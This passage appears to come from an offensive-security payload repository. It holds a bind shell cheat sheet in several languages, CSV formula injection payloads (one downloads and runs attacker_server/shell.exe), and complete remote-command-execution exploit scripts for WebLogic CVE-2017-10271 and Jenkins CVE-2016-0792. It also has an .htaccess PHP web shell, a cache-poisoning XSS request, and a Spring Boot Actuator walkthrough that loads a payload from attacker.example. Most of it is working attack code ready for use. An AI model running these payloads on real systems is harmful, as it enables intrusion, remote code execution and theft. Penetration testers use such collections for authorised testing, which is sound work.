OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 21 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 22 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 23 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 24 | * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 25 | * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 26 | * [Instagram's Million Dollar 
Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 27 | * [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 28 | * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 29 | * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) 30 | * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh 31 | * [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) -------------------------------------------------------------------------------- /Methodology and Resources/Bind Shell Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Bind Shell 2 | 3 | ## Summary 4 | 5 | * [Bind Shell](#bind-shell) 6 | * [Perl](#perl) 7 | * [Python](#python) 8 | * [PHP](#php) 9 | * [Ruby](#ruby) 10 | * [Netcat Traditional](#netcat-traditional) 11 | * [Netcat OpenBsd](#netcat-openbsd) 12 | * [Ncat](#ncat) 13 | * [Socat](#socat) 14 | * [Powershell](#powershell) 15 | 16 | 17 | ## Perl 18 | 19 | ```perl 20 | perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ 21 | bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ 22 | close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' 23 | ``` 24 | 25 | ## Python 26 | 27 | Single line : 28 | ```python 29 | python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' 30 | 
``` 31 | 32 | Expanded version : 33 | 34 | ```python 35 | import socket as s,subprocess as sp; 36 | 37 | s1 = s.socket(s.AF_INET, s.SOCK_STREAM); 38 | s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); 39 | s1.bind(("0.0.0.0", 51337)); 40 | s1.listen(1); 41 | c, a = s1.accept(); 42 | 43 | while True: 44 | d = c.recv(1024).decode(); 45 | p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); 46 | c.sendall(p.stdout.read()+p.stderr.read()) 47 | ``` 48 | 49 | ## PHP 50 | 51 | ```php 52 | php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ 53 | socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ 54 | $in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ 55 | socket_write($cl,$m,strlen($m));}}' 56 | ``` 57 | 58 | ## Ruby 59 | 60 | ```ruby 61 | ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' 62 | ``` 63 | 64 | ## Netcat Traditional 65 | 66 | ```powershell 67 | nc -nlvp 51337 -e /bin/bash 68 | ``` 69 | 70 | ## Netcat OpenBsd 71 | 72 | ```powershell 73 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f 74 | ``` 75 | 76 | ## Socat 77 | 78 | ```powershell 79 | user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 80 | user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane 81 | ``` 82 | 83 | ## Powershell 84 | 85 | ```powershell 86 | https://github.com/besimorhino/powercat 87 | 88 | # Victim (listen) 89 | . .\powercat.ps1 90 | powercat -l -p 7002 -ep 91 | 92 | # Connect from attacker 93 | . 
.\powercat.ps1 94 | powercat -c 127.0.0.1 -p 7002 95 | ``` 96 | -------------------------------------------------------------------------------- /CSV Injection/README.md: -------------------------------------------------------------------------------- 1 | # CSV Injection (Formula Injection) 2 | 3 | Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. 4 | 5 | ## Exploit 6 | 7 | Basic exploit with Dynamic Data Exchange 8 | 9 | ```powershell 10 | # pop a calc 11 | DDE ("cmd";"/C calc";"!A0")A0 12 | @SUM(1+1)*cmd|' /C calc'!A0 13 | =2+5+cmd|' /C calc'!A0 14 | 15 | # pop a notepad 16 | =cmd|' /C notepad'!'A1' 17 | 18 | # powershell download and execute 19 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 20 | 21 | # msf smb delivery with rundll32 22 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 23 | 24 | # Prefix obfuscation and command chaining 25 | =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A 26 | =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A 27 | +thespanishinquisition(cmd|'/c calc.exe'!A 28 | = cmd|'/c calc.exe'!A 29 | 30 | # Using rundll32 instead of cmd 31 | =rundll32|'URL.dll,OpenURL calc.exe'!A 32 | =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A 33 | 34 | # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. 35 | = C m D | '/ c c al c . e x e ' ! 
A 36 | 37 | ``` 38 | 39 | Technical details of the above payload (a DDE reference has the form `server|topic!item`): 40 | 41 | - `cmd` is the DDE server (application) name that the client connects to 42 | - `/C calc` is the topic, which here is the program to run (calc, i.e. calc.exe) 43 | - `!A0` is the item name that specifies the unit of data the server returns when the client requests it 44 | 45 | A formula can start with any of the following characters: 46 | 47 | ```powershell 48 | = 49 | + 50 | - 51 | @ 52 | ``` 53 | 54 | ## References 55 | 56 | * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) 57 | * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) 58 | * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) 59 | * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) 60 | * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) 61 | * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) 62 | * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) 63 | * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) 64 | -------------------------------------------------------------------------------- /CVE Exploits/WebLogic CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from builtins import input 3 | import requests 4 | import sys 5 | 6 | url_in = sys.argv[1] 7 | payload_url = url_in + "/wls-wsat/CoordinatorPortType" 8 | payload_header = {'content-type': 'text/xml'} 9 | 10 
| 11 | def payload_command (command_in): 12 | html_escape_table = { 13 | "&": "&amp;", 14 | '"': "&quot;", 15 | "'": "&apos;", 16 | ">": "&gt;", 17 | "<": "&lt;", 18 | } 19 | command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>" 20 | payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \ 21 | " <soapenv:Header> " \ 22 | " <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \ 23 | " <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \ 24 | " <void class=\"java.lang.ProcessBuilder\"> \n" \ 25 | " <array class=\"java.lang.String\" length=\"3\">" \ 26 | " <void index = \"0\"> " \ 27 | " <string>cmd</string> " \ 28 | " </void> " \ 29 | " <void index = \"1\"> " \ 30 | " <string>/c</string> " \ 31 | " </void> " \ 32 | " <void index = \"2\"> " \ 33 | + command_filtered + \ 34 | " </void> " \ 35 | " </array>" \ 36 | " <void method=\"start\"/>" \ 37 | " </void>" \ 38 | " </java>" \ 39 | " </work:WorkContext>" \ 40 | " </soapenv:Header>" \ 41 | " <soapenv:Body/>" \ 42 | "</soapenv:Envelope>" 43 | return payload_1 44 | 45 | def do_post(command_in): 46 | result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) 47 | 48 | if result.status_code == 500: 49 | print("Command Executed \n") 50 | else: 51 | print("Something Went Wrong \n") 52 | 53 | 54 | 55 | print("***************************************************** \n" \ 56 | "**************** Coded By 1337g ****************** \n" \ 57 | "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ 58 | "***************************************************** \n") 59 | 60 | while 1: 61 | command_in = input("Eneter your command here: ") 62 | if command_in == "exit" : exit(0) 63 | do_post(command_in) 64 | -------------------------------------------------------------------------------- /Insecure Direct Object References/README.md: 
-------------------------------------------------------------------------------- 1 | # Insecure Direct Object References 2 | 3 | > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Exploit](#exploit) 9 | * [Examples](#examples) 10 | * [References](#references) 11 | 12 | ## Tools 13 | 14 | - Burp Suite plugin Authz 15 | - Burp Suite plugin AuthMatrix 16 | - Burp Suite plugin Authorize 17 | 18 | ## Exploit 19 | 20 | ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png) 21 | 22 | The value of a parameter is used directly to retrieve a database record. 
23 | 24 | ```powershell 25 | http://foo.bar/somepage?invoice=12345 26 | ``` 27 | 28 | The value of a parameter is used directly to perform an operation in the system 29 | 30 | ```powershell 31 | http://foo.bar/changepassword?user=someuser 32 | ``` 33 | 34 | The value of a parameter is used directly to retrieve a file system resource 35 | 36 | ```powershell 37 | http://foo.bar/showImage?img=img00011 38 | ``` 39 | 40 | The value of a parameter is used directly to access application functionality 41 | 42 | ```powershell 43 | http://foo.bar/accessPage?menuitem=12 44 | ``` 45 | 46 | ## Examples 47 | 48 | * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) 49 | * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) 50 | 51 | ## References 52 | 53 | * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) 54 | * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) 55 | * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) 56 | * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec 57 | * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) 58 | * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 59 | * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 
2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) -------------------------------------------------------------------------------- /CVE Exploits/Jenkins CVE-2016-0792.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python2 2 | 3 | #Jenkins Groovy XML RCE (CVE-2016-0792) 4 | #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins 5 | #Made with <3 by @byt3bl33d3r 6 | 7 | from __future__ import print_function 8 | import requests 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | 12 | import argparse 13 | import sys 14 | 15 | parser = argparse.ArgumentParser() 16 | parser.add_argument('target', type=str, help='Target IP:PORT') 17 | parser.add_argument('command', type=str, help='Command to run on target') 18 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') 19 | 20 | if len(sys.argv) < 2: 21 | parser.print_help() 22 | sys.exit(1) 23 | 24 | args = parser.parse_args() 25 | 26 | if len(args.target.split(':')) != 2: 27 | print('[-] Target must be in format IP:PORT') 28 | sys.exit(1) 29 | 30 | if not args.command: 31 | print('[-] You must specify a command to run') 32 | sys.exit(1) 33 | 34 | ip, port = args.target.split(':') 35 | 36 | print('[*] Target IP: {}'.format(ip)) 37 | print('[*] Target PORT: {}'.format(port)) 38 | 39 | xml_formatted = '' 40 | command_list = args.command.split() 41 | for cmd in command_list: 42 | xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd) 43 | 44 | xml_payload = '''<map> 45 | <entry> 46 | <groovy.util.Expando> 47 | <expandoProperties> 48 | <entry> 49 | <string>hashCode</string> 50 | <org.codehaus.groovy.runtime.MethodClosure> 51 | <delegate 
class="groovy.util.Expando" reference="../../../.."/> 52 | <owner class="java.lang.ProcessBuilder"> 53 | <command> 54 | {} 55 | </command> 56 | <redirectErrorStream>false</redirectErrorStream> 57 | </owner> 58 | <resolveStrategy>0</resolveStrategy> 59 | <directive>0</directive> 60 | <parameterTypes/> 61 | <maximumNumberOfParameters>0</maximumNumberOfParameters> 62 | <method>start</method> 63 | </org.codehaus.groovy.runtime.MethodClosure> 64 | </entry> 65 | </expandoProperties> 66 | </groovy.util.Expando> 67 | <int>1</int> 68 | </entry> 69 | </map>'''.format(xml_formatted.strip()) 70 | 71 | print('[*] Generated XML payload:') 72 | print(xml_payload) 73 | print() 74 | 75 | print('[*] Sending payload') 76 | headers = {'Content-Type': 'text/xml'} 77 | r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) 78 | 79 | paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] 80 | if r.status_code == 500: 81 | for path in paths_in_trace: 82 | if path in r.text: 83 | print('[+] Command executed successfully') 84 | break 85 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/README.md: -------------------------------------------------------------------------------- 1 | # .htaccess upload 2 | 3 | Uploading an .htaccess file to override Apache rule and execute PHP. 4 | "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. 
One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded." 5 | 6 | Self-contained .htaccess web shell 7 | 8 | ```apache 9 | # Self contained .htaccess web shell - Part of the htshell project 10 | # Written by Wireghoul - http://www.justanotherhacker.com 11 | 12 | # Override the default deny rule to make the .htaccess file accessible over the web 13 | <Files ~ "^\.ht"> 14 | Order allow,deny 15 | Allow from all 16 | </Files> 17 | 18 | # Make the .htaccess file be interpreted as a PHP file. This occurs after Apache has interpreted 19 | # the Apache directives from the .htaccess file 20 | AddType application/x-httpd-php .htaccess 21 | ``` 22 | 23 | ```php 24 | ###### SHELL ###### 25 | <?php echo "\n";passthru($_GET['c']." 2>&1"); ?> 26 | ``` 27 | 28 | # .htaccess upload as image 29 | 30 | If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. 31 | 32 | [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). Since `.htaccess` ignores lines starting with `\x00` and `#`, you can use the following scripts to generate a valid `.htaccess/image` polyglot. 
33 | 34 | ```python 35 | # create valid .htaccess/xbm image 36 | 37 | width = 50 38 | height = 50 39 | payload = '# .htaccess file' 40 | 41 | with open('.htaccess', 'w') as htaccess: 42 | htaccess.write('#define test_width %d\n' % (width, )) 43 | htaccess.write('#define test_height %d\n' % (height, )) 44 | htaccess.write(payload) 45 | ``` 46 | or 47 | ```python 48 | # create valid .htaccess/wbmp image 49 | 50 | type_header = b'\x00' 51 | fixed_header = b'\x00' 52 | width = b'50' 53 | height = b'50' 54 | payload = b'# .htaccess file' 55 | 56 | with open('.htaccess', 'wb') as htaccess: 57 | htaccess.write(type_header + fixed_header + width + height) 58 | htaccess.write(b'\n') 59 | htaccess.write(payload) 60 | ``` 61 | 62 | ## Thanks to 63 | 64 | * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) 65 | * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) 66 | * [Writeup to l33t-hoster task, Insomnihack Teaser 2019](http://corb3nik.github.io/blog/insomnihack-teaser-2019/l33t-hoster) 67 | -------------------------------------------------------------------------------- /TWITTER.md: -------------------------------------------------------------------------------- 1 | # Twitter 2 | 3 | Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. 
4 | 5 | 6 | ### Accounts 7 | 8 | - [@Stök - Bug bounty hunter, cybersecurity educational content creator](https://twitter.com/stokfredrik) 9 | - [@NahamSec - Hacker & content creator & co-founder bugbountyforum and http://recon.dev](https://twitter.com/NahamSec) 10 | - [@dawgyg - Bug bounty hunter, reformed blackhat, Synack red team member](https://twitter.com/thedawgyg) 11 | - [@putsi - Bug bounty hunter and white hat hacker in Team ROT](https://twitter.com/putsi) 12 | - [@thecybermentor - Offers cybersecurity and hacking courses](https://twitter.com/thecybermentor) 13 | - [@InsiderPhD - PhD student, occasional bug bounty hunter & educational cyber security youtuber](https://twitter.com/InsiderPhD) 14 | - [@LiveOverflow - Content creator and hacker producing videos on various IT security topics and participating in hacking contests](https://twitter.com/LiveOverflow) 15 | - [@EdOverflow - Web developer, security researcher and triager for numerous vulnerability disclosure programs](https://twitter.com/edoverflow) 16 | - [@r0bre - Bug Hunter for web- and systemsecurity, iOS Security researcher](https://twitter.com/r0bre) 17 | - [@intigriti - European ethical hacking & bug bounty platform](https://twitter.com/intigriti) 18 | - [@Hacker0x01 - American bug bounty platform](https://twitter.com/Hacker0x01) 19 | - [@bugcrowd - Another american bug bounty platform](https://twitter.com/Bugcrowd) 20 | - [@hakluke - Bug bounty hunter, content creator, creator of some great pentesting tools like hakrawler](https://twitter.com/hakluke) 21 | - [@spaceraccoon - Security researcher and white hat hacker. 
Has worked on several bug bounty programs](https://twitter.com/spaceraccoonsec) 22 | - [@samwcyo - Full time bug bounty hunter](https://twitter.com/samwcyo) 23 | - [@Th3G3nt3lman - Security Research & Bug bounty hunter](https://twitter.com/Th3G3nt3lman) 24 | - [@securinti - Dutch bug bounty hunter & head of hackers and board member @ intigriti](https://twitter.com/securinti) 25 | - [@jobertabma - Co-founder of HackerOne, security researcher](https://twitter.com/jobertabma) 26 | - [@codingo_ - Global Head of Security Ops and Researcher Enablement bugcrowd, Maintainer of some great pentesting tools like NoSQLMap or VHostScan](https://twitter.com/codingo_) 27 | - [@TomNomNom - security researcher, maintainer of many very useful pentesting tools](https://twitter.com/TomNomNom) 28 | - [@orange_8361 - bug bounty hunter and security researcher, specialized in RCE bugs](https://twitter.com/orange_8361) 29 | - [@d0nutptr - part-time bug hunter, Lead Security Engineer at graplsec](https://twitter.com/d0nutptr) 30 | - [@filedescriptor - security researcher, bug hunter and content creator at 0xReconless](https://twitter.com/filedescriptor) 31 | - [@0xReconless - Security research, blogs, and videos by filedescriptor, ngalongc & EdOverflow](https://twitter.com/0xReconless) 32 | - [@pentest_swissky - Author of PayloadsAllTheThings & SSRFmap](https://twitter.com/pentest_swissky) 33 | - [@GentilKiwi - Author of Mimikatz & Kekeo](https://twitter.com/gentilkiwi) 34 | -------------------------------------------------------------------------------- /Web Cache Deception/README.md: -------------------------------------------------------------------------------- 1 | # Web Cache Deception Attack 2 | 3 | ## Tools 4 | 5 | * [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner) 6 | > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. 7 | 8 | ## Exploit 9 | 10 | 1. 
Browser requests `http://www.example.com/home.php/non-existent.css`. 11 | 2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct not to cache this page. 12 | 3. The response goes through the proxy. 13 | 4. The proxy identifies that the file has a `.css` extension. 14 | 5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside. 15 | 16 | ## Methodology of the attack - example 17 | 18 | 1. Normal browsing, visit home : `https://www.example.com/myaccount/home/` 19 | 2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css` 20 | 3. The page is displayed as /home and the cache saves the page 21 | 4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicious.css` 22 | 5. The content of the cache is displayed 23 | 24 | Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page 25 | [![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093) 26 | 27 | ## Methodology 2 28 | 29 | 1. Find an unkeyed input for cache poisoning 30 | ```js 31 | Values: User-Agent 32 | Values: Cookie 33 | Header: X-Forwarded-Host 34 | Header: X-Host 35 | Header: X-Forwarded-Server 36 | Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host) 37 | Header: X-Original-URL (Symfony) 38 | Header: X-Rewrite-URL (Symfony) 39 | ``` 40 | 2. Cache poisoning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a cache buster so that only this page is cached instead of the main page of the website) 41 | ```js 42 | GET /test?buster=123 HTTP/1.1 43 | Host: target.com 44 | X-Forwarded-Host: test"><script>alert(1)</script> 45 | 46 | HTTP/1.1 200 OK 47 | Cache-Control: public, no-cache 48 | [..] 
49 | <meta property="og:image" content="https://test"><script>alert(1)</script>"> 50 | ``` 51 | 52 | 53 | ## References 54 | 55 | * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) 56 | * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) 57 | * [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement) 58 | * [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) 59 | * [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning) 60 | - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws) 61 | - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws) 62 | -------------------------------------------------------------------------------- /Insecure Management Interface/README.md: -------------------------------------------------------------------------------- 1 | # Insecure management interface 2 | 3 | ## Springboot-Actuator 4 | 5 | Actuator endpoints let you monitor and interact with your application. 6 | Spring Boot includes a number of built-in endpoints and lets you add your own. 7 | For example, the `/health` endpoint provides basic application health information. 8 | 9 | Some of them contain sensitive information, such as: 10 | 11 | - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). 12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). 13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. 
14 | - `/dump` - Displays a dump of threads (including a stack trace). 15 | - `/logfile` - Outputs the contents of the log file. 16 | - `/mappings` - Shows all of the MVC controller mappings. 17 | 18 | These endpoints are enabled by default in Springboot 1.X. 19 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. 20 | 21 | Since Springboot 2.X only `/health` and `/info` are enabled by default. 22 | 23 | ### Remote Code Execution via `/env` 24 | 25 | Spring is able to load external configurations in the YAML format. 26 | The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. 27 | In other words, an attacker can gain remote code execution by loading a malicious config file. 28 | 29 | #### Steps 30 | 31 | 1. Generate a payload of SnakeYAML deserialization gadget. 32 | 33 | - Build malicious jar 34 | ```bash 35 | git clone https://github.com/artsploit/yaml-payload.git 36 | cd yaml-payload 37 | # Edit the payload before executing the last commands (see below) 38 | javac src/artsploit/AwesomeScriptEngineFactory.java 39 | jar -cvf yaml-payload.jar -C src/ . 40 | ``` 41 | 42 | - Edit src/artsploit/AwesomeScriptEngineFactory.java 43 | 44 | ```java 45 | public AwesomeScriptEngineFactory() { 46 | try { 47 | Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE 48 | } catch (IOException e) { 49 | e.printStackTrace(); 50 | } 51 | } 52 | ``` 53 | 54 | - Create a malicious yaml config (yaml-payload.yml) 55 | 56 | ```yaml 57 | !!javax.script.ScriptEngineManager [ 58 | !!java.net.URLClassLoader [[ 59 | !!java.net.URL ["http://attacker.example/yaml-payload.jar"] 60 | ]] 61 | ] 62 | ``` 63 | 64 | 65 | 2. Host the malicious files on your server. 66 | 67 | - yaml-payload.jar 68 | - yaml-payload.yml 69 | 70 | 71 | 3. Change `spring.cloud.bootstrap.location` to your server. 
72 | 73 | ``` 74 | POST /env HTTP/1.1 75 | Host: victim.example:8090 76 | Content-Type: application/x-www-form-urlencoded 77 | Content-Length: 59 78 | 79 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml 80 | ``` 81 | 82 | 4. Reload the configuration. 83 | 84 | ``` 85 | POST /refresh HTTP/1.1 86 | Host: victim.example:8090 87 | Content-Type: application/x-www-form-urlencoded 88 | Content-Length: 0 89 | ``` 90 | 91 | ## References 92 | 93 | * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) 94 | * [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) 95 | -------------------------------------------------------------------------------- /SQL Injection/SQLite Injection.md: -------------------------------------------------------------------------------- 1 | # SQLite Injection 2 | 3 | ## Summary 4 | 5 | * [SQLite comments](#sqlite-comments) 6 | * [SQLite version](#sqlite-version) 7 | * [Integer/String based - Extract table name](#integerstring-based---extract-table-name) 8 | * [Integer/String based - Extract column name](#integerstring-based---extract-column-name) 9 | * [Boolean - Count number of tables](#boolean---count-number-of-tables) 10 | * [Boolean - Enumerating table name](#boolean---enumerating-table-name) 11 | * [Boolean - Extract info](#boolean---extract-info) 12 | * [Time based](#time-based) 13 | * [Remote Command Execution using SQLite command - Attach Database](#remote-command-execution-using-sqlite-command---attach-database) 14 | * [Remote Command Execution using SQLite command - Load_extension](#remote-command-execution-using-sqlite-command---load_extension) 15 | * [References](#references) 16 | ## SQLite comments 17 | 18 | ```sql 19 | -- 20 | /**/ 21 | ``` 22 | 23 | ## SQLite version 24 | 25 | ```sql 26 | select sqlite_version(); 27 | ``` 28 | 29 | ## Integer/String based - Extract 
